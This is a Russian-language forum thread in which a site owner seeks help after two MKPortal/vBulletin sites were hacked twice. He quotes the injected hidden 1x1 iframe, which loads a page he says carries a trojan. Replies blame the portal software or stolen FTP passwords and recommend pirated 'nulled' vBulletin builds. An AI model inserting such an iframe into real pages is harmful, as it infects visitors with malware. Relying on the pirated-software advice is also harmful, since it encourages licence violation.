[vd9]

Можете посмотреть, на данный момент сайт (ok.dvn.in) в дауне, т.к. я на работе и здесь у меня нет доступа к ftp :(
Если посмотреть код страницы, то там виден фрейм

Код:

<iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no>

Уже второй раз ломают, первый раз данный фрейм вставляли, когда стоял 3.6.4 все подчистил проапдейтился до 3.6.7. и вот те на, снова.
Сам сайт работает на MKPortal в связке с воблой 3.6.7 PL1 (периодически ставлю патчи, которые здесь выкладывают)
Х/з, что именно сломали MKP или воблу, на офф.сайте MKP ничего про баги нет, видимо всетаки где то находят косяк в вобле.
На странице, на которую ссылается фрейм троян, кто нить сталкивался с этим?

[VipeR]

vd9, критическая уязвимость скорее в MKPortal'е, чем в vB. Имхо, поддержки "фактической" у него нет, полу-мертвый проект. Что касается vB, чей релиз ставил?

[vd9]

Форум все время беру здесь на vbsupport.org

Добавлено через 3 минуты
Почему тогда выдается ошибка forum/includes/config.php on line 186

[VipeR]

Цитата:

Сообщение от vd9

Форум все время беру здесь на vbsupport.org

Ясно дело..

Под вопросом

Цитата:

Сообщение от VipeR

чей релиз ставил?

я имел ввиду автора нуля.

[VipeR]

Цитата:

Сообщение от vd9

Почему тогда выдается ошибка forum/includes/config.php on line 186

Строка 186? гм.. в конфиге всего 178 строк.. Что у тебя там?

[vd9]

Цитата:

Сообщение от VipeR

я имел ввиду автора нуля.

AnTekapb

Цитата:

Строка 186? гм.. в конфиге всего 178 строк.. Что у тебя там?

х/з че там, пока посмотреть не могу т.к. все хозяйство сайта на домашнем компе.
Прикол в том, что взломано 2 сайта второй boerboel.dvn.in по структуре они идентичны, но там ошибка в 187 строке.

[VipeR]

Цитата:

Сообщение от vd9

AnTekapb

http://vbsupport.org/forum/showthrea...t=9674&page=40

Используй нуль от Ateist'а или от GYSN.

Цитата:

Сообщение от vd9

Прикол в том, что взломано 2 сайта второй boerboel.dvn.in по структуре они идентичны, но там ошибка в 187 строке.

На втором сайте тоже MKPortal стоял?

[netwind]

ты бы лучше пароль на ftp сменил бы, чем на воблу гнать
какиры, которые могут поломать воблу, врядли будут ставить iframe, им бы что поприкольнее.
а у тебя оптовые хакеры, они пароли на ftp тысячами тырят и продают свои услуги всяким накрутчикам

[vd9]

угу, все одинаково было

Добавлено через 40 секунд

Цитата:

Сообщение от netwind

ты бы лучше пароль на ftp сменил бы, чем на воблу гнать

причем здесь пароль ftpшника?

[netwind]

даже лучше сначала комп на вирусы проверь, удали , а потом поменяй.
сейчас так модно :
http://www.host.ru/news/2007/03/19.html